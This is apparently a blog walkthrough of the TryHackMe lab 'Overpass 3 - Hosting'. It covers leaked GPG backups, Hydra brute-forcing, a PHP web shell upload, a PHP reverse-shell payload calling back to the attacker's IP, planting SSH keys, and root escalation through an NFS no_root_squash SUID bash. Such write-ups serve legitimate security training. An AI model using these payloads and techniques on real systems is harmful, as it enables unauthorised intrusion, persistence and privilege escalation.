THM: Overpass 3 - Hosting
Overpass3
You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security…
This is Overpass 3 - Hosting from THM. It’s medium rated. I add overpass3 to /etc/hosts.
Ports
We’ve got FTP, SSH and HTTP on the standard ports.
FTP
No anonymous access, we’ll move on for now.
HTTP
I started trying dirsearch and I must say it’s pretty comfy:
root@kali:/opt/tryhackme/overpass3# python3 /opt/dirsearch/dirsearch.py -u http://overpass3
It comes with it’s own wordlist (although you can use any), and it finds something useful:
[05:22:59] 301 - 233B - /backups -> http://overpass3/backups/
[05:23:00] 200 - 894B - /backups/
From there, we get a file called backup.zip, which is not password protected and which contains two files:
12K -rw-r–r– 1 root root 11K Nov 8 16:18 CustomerDetails.xlsx.gpg
4.0K -rw——- 1 root root 3.5K Nov 8 16:16 priv.key
This is PGP stuff:
root@kali:/opt/tryhackme/overpass3/temporary# gpg --import priv.key
gpg: key C9AE71AB3180BC08: "Paradox <[email protected]>" not changed
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys unchanged: 1
root@kali:/opt/tryhackme/overpass3/temporary# gpg --decrypt CustomerDetails.xlsx.gpg > details.xlsx
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
"Paradox <[email protected]>"This gets us an Excel file containing 3 usernames and passwords.
Hydra
Which service to use this on? We can try them both:
root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ftp://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:31:48
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ftp://overpass3:21/
[21][ftp] host: overpass3 login: paradox password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 05:31:53
root@kali:/opt/tryhackme/overpass3# hydra -L users.txt -P pass.txt ssh://overpass3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 05:32:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://overpass3:22/
[ERROR] target ssh://10.10.188.216:22/ does not support password authentication (method reply 36).Right, so we can log in to FTP, but SSH is key based only. Goodo.
FTP, again
We log in to FTP and we get the root of the webserver. A little testing shows we can upload to this directory, so I upload something simple in a file called cmd.php:
<?php system($_GET['cmd']);?>And I send it this from Burpsuite:
cmd=php+-r+'$sock%3dfsockopen("10.9.10.123",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'
to get a shell.
Apache
The host is running CentOS and we are the Apache user. We don’t seem to have which; no matter.
sh-4.4$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.4$ which python3
which python3
which: no python3 in ((null))
sh-4.4$ ls /usr/bin | grep python
ls /usr/bin | grep python
python3
python3.6
python3.6m
unversioned-python
sh-4.4$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
/usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
bash-4.4$ From bash, we can su to paradox using the same password as for the FTP account. He has a .ssh directory in his home, and we can add our key to his authorized_keys file to get SSH access:
[paradox@localhost .ssh]$ printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeyp%%AND THE REST OF MY PUBLIC KEY%%/orR1AjlnSE= root@kali\n' >> authorized_keysNow we can just do:
root@kali:/opt/tryhackme/overpass3# ssh paradox@overpass3
Last login: Thu Jan 14 10:40:45 2021
[paradox@localhost ~]$ James
As paradox I run linpeas, which finds this in /etc/exports:
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
However thinking back we had no port 2049, so NFS is only open on the localhost. We can’t mount the share on this host, because we aren’t root. Hmm.
SSH Tunnel
We can mount the share using an SSH tunnel on our local machine. First, we set up the tunnel:
root@kali:/opt/tryhackme/overpass3# ssh -L 3049:127.0.0.1:2049 paradox@overpass3
Next, we mount the share:
root@kali:/opt/tryhackme/overpass3# mount -t nfs -o port=3049,vers=4 127.0.0.1:/ ./mnt
Where ./mnt was a local folder I’d created. Note this syntax caused me quite a few headaches; particularly the path part - NFS4 is different to NFS3 and the shared path is considered / when you mount it.
From there, we could get the user flag:
root@kali:/opt/tryhackme/overpass3/mnt# ls -lash
total 20K
0 drwx------ 3 james kali 112 Nov 17 16:15 .
4.0K drwxr-xr-x 5 root root 4.0K Jan 13 05:48 ..
0 lrwxrwxrwx 1 root root 9 Nov 8 16:45 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 james kali 18 Nov 8 2019 .bash_logout
4.0K -rw-r--r-- 1 james kali 141 Nov 8 2019 .bash_profile
4.0K -rw-r--r-- 1 james kali 312 Nov 8 2019 .bashrc
0 drwx------ 2 james kali 61 Nov 7 21:20 .ssh
4.0K -rw------- 1 james kali 38 Nov 17 16:15 user.flagNote there was also a web flag belonging to Apache; it was in the home directory for the apache user. We can find that by looking in /etc/passwd; it’s /usr/share/httpd. Anyway, onwards …
Root
Privesc was now a fairly classic NFS technique - make a copy of bash in our mounted drive and give it the SUID bit:
root@kali:/opt/tryhackme/overpass3/mnt# cp /bin/bash .
root@kali:/opt/tryhackme/overpass3/mnt# chmod +s bashDoesn’t look like much, does it? While I’m at it, I add my SSH public key to the authorized_keys file for james just like I did for paradox.
Separately:
root@kali:/opt/tryhackme/overpass3# ssh james@overpass3
Last login: Thu Jan 14 09:15:57 2021 from 10.9.10.123
[james@localhost ~]$ pwd
/home/james
[james@localhost ~]$ ls -lash
total 1.2M
0 drwx------. 4 james james 138 Jan 14 10:14 .
0 drwxr-xr-x. 4 root root 34 Nov 8 19:34 ..
1.2M -rwsr-sr-x 1 root root 1.2M Jan 14 10:14 bash
0 lrwxrwxrwx. 1 root root 9 Nov 8 21:45 .bash_history -> /dev/null
4.0K -rw-r--r--. 1 james james 18 Nov 8 2019 .bash_logout
4.0K -rw-r--r--. 1 james james 141 Nov 8 2019 .bash_profile
4.0K -rw-r--r--. 1 james james 312 Nov 8 2019 .bashrc
0 drwx------ 2 james james 44 Jan 14 09:17 .gnupg
0 drwx------. 2 james james 61 Nov 8 02:20 .ssh
4.0K -rw-------. 1 james james 38 Nov 17 21:15 user.flag
[james@localhost ~]$ ./bash -p
./bash: /lib64/libtinfo.so.6: no version information available (required by ./bash)
bash-5.1# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),1000(james)
bash-5.1#And that was that.
Footnote
I haven’t written anything for a bit; I’ve been trying (and failing) on EnterPrize, a new hard box on THM. I’ve enumerated the box, found the hidden subdomain (maintest.enterprize.thm) and poked around. It’s typo3, and I am fairly sure the exploit is a PHP deserialization as described here using a leaked encryptionKey, which can be found on the box and which I have. However I have tried the exploit as described and so far I can’t get it to work. Ah well, it’s kept me entertained anyway.